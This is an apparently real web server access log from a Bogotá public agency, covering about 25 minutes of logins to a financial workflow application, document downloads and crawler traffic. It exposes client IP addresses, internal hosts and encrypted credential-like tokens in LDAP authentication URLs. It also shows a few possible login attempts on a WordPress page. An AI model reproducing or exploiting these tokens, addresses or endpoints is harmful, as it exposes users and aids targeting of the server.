52.167.144.49 - - [11/Feb/2023:07:22:49 -0500] "GET /BLA/resoluciones/AUTOS%202021/1607.pdf HTTP/1.1" 200 378162
186.29.202.223 - - [11/Feb/2023:07:23:10 -0500] "GET /sipse/faces/index.xhtml HTTP/1.1" 200 677
186.29.202.223 - - [11/Feb/2023:07:23:10 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
186.29.202.223 - - [11/Feb/2023:07:23:10 -0500] "GET /sipse/faces/faces/autenticacion.xhtml HTTP/1.1" 200 12181
186.29.202.223 - - [11/Feb/2023:07:23:11 -0500] "GET /sipse/js/disable_browser_buttons.js HTTP/1.1" 304 -
186.29.202.223 - - [11/Feb/2023:07:23:11 -0500] "GET /sipse/css/custom_css_sg_prime_login.css HTTP/1.1" 304 -
186.29.202.223 - - [11/Feb/2023:07:23:11 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
186.29.202.223 - - [11/Feb/2023:07:23:11 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.202.223 - - [11/Feb/2023:07:23:11 -0500] "GET /sipse/js/funciones.js HTTP/1.1" 304 -
186.29.202.223 - - [11/Feb/2023:07:23:11 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.202.223 - - [11/Feb/2023:07:23:11 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.202.223 - - [11/Feb/2023:07:23:11 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.202.223 - - [11/Feb/2023:07:23:11 -0500] "GET /sipse/css/custom_css_sg.css HTTP/1.1" 304 -
186.29.202.223 - - [11/Feb/2023:07:23:11 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.202.223 - - [11/Feb/2023:07:23:11 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.202.223 - - [11/Feb/2023:07:23:11 -0500] "GET /sipse/css/imagen/logoSDG.png HTTP/1.1" 304 -
186.29.202.223 - - [11/Feb/2023:07:23:11 -0500] "GET /sipse/css/imagen/loginimg.png HTTP/1.1" 304 -
186.29.202.223 - - [11/Feb/2023:07:23:11 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-icons_898989_256x240.png?ln=primefaces-aristo HTTP/1.1" 304 -
186.29.202.223 - - [11/Feb/2023:07:23:16 -0500] "POST /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 2224
186.29.202.223 - - [11/Feb/2023:07:23:16 -0500] "GET /sipse/faces/javax.faces.resource/messages/messages.png?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.202.223 - - [11/Feb/2023:07:23:17 -0500] "POST /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 16297
186.29.202.223 - - [11/Feb/2023:07:23:17 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
186.29.202.223 - - [11/Feb/2023:07:23:17 -0500] "GET /sipse/css/custom_css_sg_prime.css HTTP/1.1" 304 -
186.29.202.223 - - [11/Feb/2023:07:23:17 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.202.223 - - [11/Feb/2023:07:23:17 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.202.223 - - [11/Feb/2023:07:23:18 -0500] "GET /sipse/js/jquery.min.js HTTP/1.1" 304 -
186.29.202.223 - - [11/Feb/2023:07:23:18 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.202.223 - - [11/Feb/2023:07:23:18 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.202.223 - - [11/Feb/2023:07:23:18 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.202.223 - - [11/Feb/2023:07:23:18 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.202.223 - - [11/Feb/2023:07:23:18 -0500] "GET /sipse/imagenes/cargando.gif HTTP/1.1" 304 -
186.29.202.223 - - [11/Feb/2023:07:23:18 -0500] "GET /sipse/css/imagen/contrasena.png HTTP/1.1" 404 383
216.245.221.92 - - [11/Feb/2023:07:23:18 -0500] "HEAD / HTTP/1.1" 200 -
186.29.202.223 - - [11/Feb/2023:07:23:18 -0500] "GET /sipse/imagenes/logoAplicacion.jpg HTTP/1.1" 304 -
186.29.202.223 - - [11/Feb/2023:07:23:20 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-bg_flat_0_2d5972_40x100.png?ln=primefaces-aristo HTTP/1.1" 304 -
186.29.202.223 - - [11/Feb/2023:07:23:20 -0500] "POST /sipse/faces/bienvenido.xhtml HTTP/1.1" 200 9754
45.238.182.54 - - [11/Feb/2023:07:23:25 -0500] "GET /agendate-para-participar-en-las-caminatas-ecologicas-de-febrero.html HTTP/1.1" 200 830
186.29.202.223 - - [11/Feb/2023:07:23:43 -0500] "POST /sipse/faces/bienvenido.xhtml HTTP/1.1" 200 9754
186.29.202.223 - - [11/Feb/2023:07:23:46 -0500] "POST /sipse/faces/bienvenido.xhtml HTTP/1.1" 200 2073
186.29.202.223 - - [11/Feb/2023:07:23:47 -0500] "POST /sipse/faces/bienvenido.xhtml HTTP/1.1" 200 39034
186.29.202.223 - - [11/Feb/2023:07:23:47 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
186.29.202.223 - - [11/Feb/2023:07:23:47 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.202.223 - - [11/Feb/2023:07:23:47 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.202.223 - - [11/Feb/2023:07:23:47 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.202.223 - - [11/Feb/2023:07:23:47 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.202.223 - - [11/Feb/2023:07:23:47 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.202.223 - - [11/Feb/2023:07:23:47 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
52.167.144.97 - - [11/Feb/2023:07:23:49 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES+2021%2F HTTP/1.1" 200 438284
186.29.202.223 - - [11/Feb/2023:07:24:20 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 12917
186.29.202.223 - - [11/Feb/2023:07:24:50 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 12950
186.29.202.223 - - [11/Feb/2023:07:24:57 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 12940
186.29.202.223 - - [11/Feb/2023:07:25:10 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 12813
186.29.202.223 - - [11/Feb/2023:07:25:18 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 12876
186.29.202.223 - - [11/Feb/2023:07:25:23 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 12813
186.29.202.223 - - [11/Feb/2023:07:25:27 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 12811
186.29.202.223 - - [11/Feb/2023:07:25:31 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 12972
186.29.202.223 - - [11/Feb/2023:07:25:40 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 12942
186.29.202.223 - - [11/Feb/2023:07:25:45 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 12904
201.245.192.253 - - [11/Feb/2023:07:25:55 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
186.29.202.223 - - [11/Feb/2023:07:26:01 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 12905
186.29.202.223 - - [11/Feb/2023:07:26:17 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 12973
186.29.202.223 - - [11/Feb/2023:07:26:25 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 13017
186.29.202.223 - - [11/Feb/2023:07:26:33 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 12973
69.171.231.3 - - [11/Feb/2023:07:26:40 -0500] "GET /images/8%20de%20febrero%20incendio%20forestal.jpeg HTTP/1.1" 200 56283
186.29.202.223 - - [11/Feb/2023:07:26:44 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 12947
66.249.64.45 - - [11/Feb/2023:07:26:46 -0500] "-" 408 -
186.29.202.223 - - [11/Feb/2023:07:26:50 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 12932
186.29.202.223 - - [11/Feb/2023:07:26:59 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 12927
186.29.202.223 - - [11/Feb/2023:07:27:05 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 12927
186.29.202.223 - - [11/Feb/2023:07:27:10 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 12850
172.22.2.4 - - [11/Feb/2023:07:25:33 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
186.29.202.223 - - [11/Feb/2023:07:27:19 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 13043
172.22.2.4 - - [11/Feb/2023:07:26:23 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59035
216.245.221.92 - - [11/Feb/2023:07:28:18 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [11/Feb/2023:07:28:21 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 40797
201.245.192.253 - - [11/Feb/2023:07:28:24 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 41453
207.46.13.10 - - [11/Feb/2023:07:29:18 -0500] "GET /bla/resoluciones/autos%202021/0322.pdf HTTP/1.1" 200 459404
172.22.2.4 - - [11/Feb/2023:07:29:53 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/AnalisisT-095-16.docx HTTP/1.1" 304 -
157.55.39.117 - - [11/Feb/2023:07:30:48 -0500] "GET /BLA/resoluciones/AUTOS%202021/1099.pdf HTTP/1.1" 200 751927
64.62.197.30 - - [11/Feb/2023:07:30:56 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
201.245.192.253 - - [11/Feb/2023:07:30:54 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
172.22.2.4 - - [11/Feb/2023:07:29:29 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [11/Feb/2023:07:31:23 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [11/Feb/2023:07:33:17 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/CUADRO%20ANALISIS%20SENTENCIA%20T-411%20DE%201992.doc HTTP/1.1" 200 41984
216.245.221.92 - - [11/Feb/2023:07:33:18 -0500] "HEAD / HTTP/1.1" 200 -
181.61.39.98 - - [11/Feb/2023:07:33:22 -0500] "GET /sipse/faces/index.xhtml HTTP/1.1" 200 677
181.61.39.98 - - [11/Feb/2023:07:33:22 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
181.61.39.98 - - [11/Feb/2023:07:33:22 -0500] "GET /sipse/faces/faces/autenticacion.xhtml HTTP/1.1" 200 12181
181.61.39.98 - - [11/Feb/2023:07:33:23 -0500] "GET /sipse/css/custom_css_sg.css HTTP/1.1" 200 9694
181.61.39.98 - - [11/Feb/2023:07:33:23 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
181.61.39.98 - - [11/Feb/2023:07:33:23 -0500] "GET /sipse/css/custom_css_sg_prime_login.css HTTP/1.1" 200 443
181.61.39.98 - - [11/Feb/2023:07:33:23 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.61.39.98 - - [11/Feb/2023:07:33:23 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.61.39.98 - - [11/Feb/2023:07:33:23 -0500] "GET /sipse/js/funciones.js HTTP/1.1" 200 12592
181.61.39.98 - - [11/Feb/2023:07:33:23 -0500] "GET /sipse/js/disable_browser_buttons.js HTTP/1.1" 200 3230
181.61.39.98 - - [11/Feb/2023:07:33:23 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.61.39.98 - - [11/Feb/2023:07:33:23 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.61.39.98 - - [11/Feb/2023:07:33:23 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.61.39.98 - - [11/Feb/2023:07:33:23 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.61.39.98 - - [11/Feb/2023:07:33:23 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-icons_898989_256x240.png?ln=primefaces-aristo HTTP/1.1" 304 -
181.61.39.98 - - [11/Feb/2023:07:33:23 -0500] "GET /sipse/css/imagen/loginimg.png HTTP/1.1" 200 71635
181.61.39.98 - - [11/Feb/2023:07:33:23 -0500] "GET /sipse/css/imagen/logoSDG.png HTTP/1.1" 200 53064
181.61.39.98 - - [11/Feb/2023:07:33:27 -0500] "POST /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 16736
181.61.39.98 - - [11/Feb/2023:07:33:27 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
181.61.39.98 - - [11/Feb/2023:07:33:27 -0500] "GET /sipse/css/custom_css_sg_prime.css HTTP/1.1" 200 5201
181.61.39.98 - - [11/Feb/2023:07:33:27 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.61.39.98 - - [11/Feb/2023:07:33:27 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.61.39.98 - - [11/Feb/2023:07:33:27 -0500] "GET /sipse/js/jquery.min.js HTTP/1.1" 200 85582
181.61.39.98 - - [11/Feb/2023:07:33:28 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.61.39.98 - - [11/Feb/2023:07:33:28 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.61.39.98 - - [11/Feb/2023:07:33:28 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.61.39.98 - - [11/Feb/2023:07:33:28 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.61.39.98 - - [11/Feb/2023:07:33:28 -0500] "GET /sipse/css/imagen/contrasena.png HTTP/1.1" 404 383
181.61.39.98 - - [11/Feb/2023:07:33:28 -0500] "GET /sipse/imagenes/cargando.gif HTTP/1.1" 200 36959
181.61.39.98 - - [11/Feb/2023:07:33:28 -0500] "GET /sipse/imagenes/logoAplicacion.jpg HTTP/1.1" 200 155084
181.61.39.98 - - [11/Feb/2023:07:33:28 -0500] "GET /sipse/faces/javax.faces.resource/messages/messages.png?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.61.39.98 - - [11/Feb/2023:07:33:33 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-bg_flat_0_2d5972_40x100.png?ln=primefaces-aristo HTTP/1.1" 304 -
181.61.39.98 - - [11/Feb/2023:07:33:33 -0500] "POST /sipse/faces/bienvenido.xhtml HTTP/1.1" 200 1473
181.61.39.98 - - [11/Feb/2023:07:33:34 -0500] "POST /sipse/faces/bienvenido.xhtml HTTP/1.1" 200 38431
181.61.39.98 - - [11/Feb/2023:07:33:34 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
181.61.39.98 - - [11/Feb/2023:07:33:34 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.61.39.98 - - [11/Feb/2023:07:33:34 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.61.39.98 - - [11/Feb/2023:07:33:34 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.61.39.98 - - [11/Feb/2023:07:33:34 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.61.39.98 - - [11/Feb/2023:07:33:34 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.61.39.98 - - [11/Feb/2023:07:33:35 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
172.22.2.4 - - [11/Feb/2023:07:32:39 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 32715
181.61.39.98 - - [11/Feb/2023:07:33:43 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 12937
172.22.2.4 - - [11/Feb/2023:07:32:13 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 51643
181.61.39.98 - - [11/Feb/2023:07:33:55 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 34440
181.61.39.98 - - [11/Feb/2023:07:33:55 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 34436
181.61.39.98 - - [11/Feb/2023:07:34:02 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 2684
181.61.39.98 - - [11/Feb/2023:07:34:03 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 30519
181.61.39.98 - - [11/Feb/2023:07:34:03 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
181.61.39.98 - - [11/Feb/2023:07:34:03 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.61.39.98 - - [11/Feb/2023:07:34:03 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.61.39.98 - - [11/Feb/2023:07:34:03 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.61.39.98 - - [11/Feb/2023:07:34:03 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.61.39.98 - - [11/Feb/2023:07:34:03 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.61.39.98 - - [11/Feb/2023:07:34:03 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.61.39.98 - - [11/Feb/2023:07:34:03 -0500] "POST /sipse/faces/presentacion/workflow/reasignarReenrutar.xhtml HTTP/1.1" 200 23898
181.61.39.98 - - [11/Feb/2023:07:34:08 -0500] "POST /sipse/faces/presentacion/workflow/reasignarReenrutar.xhtml HTTP/1.1" 200 15549
173.252.95.8 - - [11/Feb/2023:07:34:11 -0500] "GET /images/2%20de%20febrero%20liberaci\xc3\xb3n%20Tunjo.jpeg HTTP/1.1" 404 1034
181.61.39.98 - - [11/Feb/2023:07:34:12 -0500] "POST /sipse/faces/presentacion/workflow/reasignarReenrutar.xhtml HTTP/1.1" 200 15638
181.61.39.98 - - [11/Feb/2023:07:34:22 -0500] "POST /sipse/faces/presentacion/workflow/reasignarReenrutar.xhtml HTTP/1.1" 200 57380
185.119.81.105 - - [11/Feb/2023:07:34:38 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.105 - - [11/Feb/2023:07:34:40 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3605
181.61.39.98 - - [11/Feb/2023:07:34:57 -0500] "POST /sipse/faces/presentacion/workflow/reasignarReenrutar.xhtml HTTP/1.1" 200 57463
186.102.12.136 - - [11/Feb/2023:07:35:01 -0500] "GET /kwssiamovil/sm/ldap/au?x=U2FsdGVkX19Hv2jOrJBrg5xrsE6xhn6GkAw/8iszJKDxuCzrZI7d+6udgJzX3EeJ&y=U2FsdGVkX1/yBXaI49uQH5IE1SBWr6dEOxNdUsUlyq9xR4pP/HGttmka1+cQt03z HTTP/1.1" 200 31
186.102.12.136 - - [11/Feb/2023:07:35:03 -0500] "GET /kwssiamovil/sm/ldap/au?x=U2FsdGVkX1+DRJ8gpzKOvEkKN4D5iJMQlaoOv5Ay7iITitg5FEpTIwew+4CUgUB2&y=U2FsdGVkX1/3Gga6g8VPTq0GkDEJi8L+Vk1LnuQ+TJ42jU+qauuEJfD+vERyb/01 HTTP/1.1" 200 31
181.61.39.98 - - [11/Feb/2023:07:35:30 -0500] "POST /sipse/faces/presentacion/workflow/reasignarReenrutar.xhtml HTTP/1.1" 200 58009
181.61.39.98 - - [11/Feb/2023:07:35:36 -0500] "POST /sipse/faces/presentacion/workflow/reasignarReenrutar.xhtml HTTP/1.1" 200 4929
181.61.39.98 - - [11/Feb/2023:07:35:47 -0500] "POST /sipse/faces/presentacion/workflow/reasignarReenrutar.xhtml HTTP/1.1" 200 5301
181.61.39.98 - - [11/Feb/2023:07:35:48 -0500] "POST /sipse/faces/presentacion/workflow/reasignarReenrutar.xhtml HTTP/1.1" 200 42165
181.61.39.98 - - [11/Feb/2023:07:35:48 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
181.61.39.98 - - [11/Feb/2023:07:35:48 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.61.39.98 - - [11/Feb/2023:07:35:48 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.61.39.98 - - [11/Feb/2023:07:35:49 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.61.39.98 - - [11/Feb/2023:07:35:49 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.61.39.98 - - [11/Feb/2023:07:35:49 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.61.39.98 - - [11/Feb/2023:07:35:49 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.61.39.98 - - [11/Feb/2023:07:35:49 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 35524
181.61.39.98 - - [11/Feb/2023:07:35:49 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 35524
181.61.39.98 - - [11/Feb/2023:07:35:53 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 12941
201.245.192.253 - - [11/Feb/2023:07:35:54 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
192.133.77.17 - - [11/Feb/2023:07:36:46 -0500] "GET /images/visor-aguas-subterraneas-9-marzo.JPG.jpg HTTP/1.1" 200 40697
199.16.157.182 - - [11/Feb/2023:07:36:46 -0500] "GET /images/visor-aguas-subterraneas-9-marzo.JPG.jpg HTTP/1.1" 200 40697
192.133.77.14 - - [11/Feb/2023:07:36:46 -0500] "GET /en-el-visor-geografico-puedes-conocer-cuantos-pozos-de-agua-subterranea-hay-en-bogota.html HTTP/1.1" 200 858
157.55.39.142 - - [11/Feb/2023:07:37:12 -0500] "GET /bla/resoluciones/autos%202021/0673.pdf HTTP/1.1" 200 401655
207.46.13.10 - - [11/Feb/2023:07:37:28 -0500] "GET /BLA/resoluciones/AUTOS%202021/1215.pdf HTTP/1.1" 200 862151
216.245.221.92 - - [11/Feb/2023:07:38:18 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [11/Feb/2023:07:38:21 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 40797
201.245.192.253 - - [11/Feb/2023:07:38:23 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 41453
172.22.2.4 - - [11/Feb/2023:07:37:13 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [11/Feb/2023:07:38:03 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57192
201.245.192.253 - - [11/Feb/2023:07:40:53 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
216.245.221.92 - - [11/Feb/2023:07:43:18 -0500] "HEAD / HTTP/1.1" 200 -
87.250.224.152 - - [11/Feb/2023:07:43:57 -0500] "-" 408 -
87.250.224.124 - - [11/Feb/2023:07:44:02 -0500] "-" 408 -
213.180.203.69 - - [11/Feb/2023:07:44:07 -0500] "-" 408 -
95.108.213.68 - - [11/Feb/2023:07:44:12 -0500] "-" 408 -
185.119.81.106 - - [11/Feb/2023:07:44:24 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.106 - - [11/Feb/2023:07:44:25 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3670
87.250.224.110 - - [11/Feb/2023:07:44:27 -0500] "-" 408 -
5.255.253.155 - - [11/Feb/2023:07:44:42 -0500] "-" 408 -
172.22.2.4 - - [11/Feb/2023:07:43:03 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
95.108.213.7 - - [11/Feb/2023:07:45:12 -0500] "-" 408 -
172.22.2.4 - - [11/Feb/2023:07:43:53 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 52942
186.102.85.136 - - [11/Feb/2023:07:45:52 -0500] "GET /kwssiamovil/sm/ldap/au?x=U2FsdGVkX19Jq1Uxec9d9wSi+1dgu7zXUCta9arFNcttAUMHmOP+9v563ZHp5TK2&y=U2FsdGVkX1/b3CV301Cc6L89V9JXx9MSoD9PUC4ue/efm/O3qTU8ojiqWUqQBuol HTTP/1.1" 200 31
201.245.192.253 - - [11/Feb/2023:07:45:51 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
186.102.85.136 - - [11/Feb/2023:07:45:54 -0500] "GET /kwssiamovil/sm/ldap/au?x=U2FsdGVkX18mIIkA9/mY6Rr9X8GDpyhrnFlh9hrVJU4onGEbQaVimPN1KYYOFHQM&y=U2FsdGVkX1/TJkNKhrXZZhkzah21NPVWT8O2eNWMQlR/0+77a2lopOWGVpsCmyoo HTTP/1.1" 200 31
87.250.224.200 - - [11/Feb/2023:07:46:12 -0500] "-" 408 -
95.108.213.33 - - [11/Feb/2023:07:47:12 -0500] "-" 408 -
52.167.144.49 - - [11/Feb/2023:07:47:22 -0500] "GET /bla/resoluciones/autos%202021/0509.pdf HTTP/1.1" 200 398322
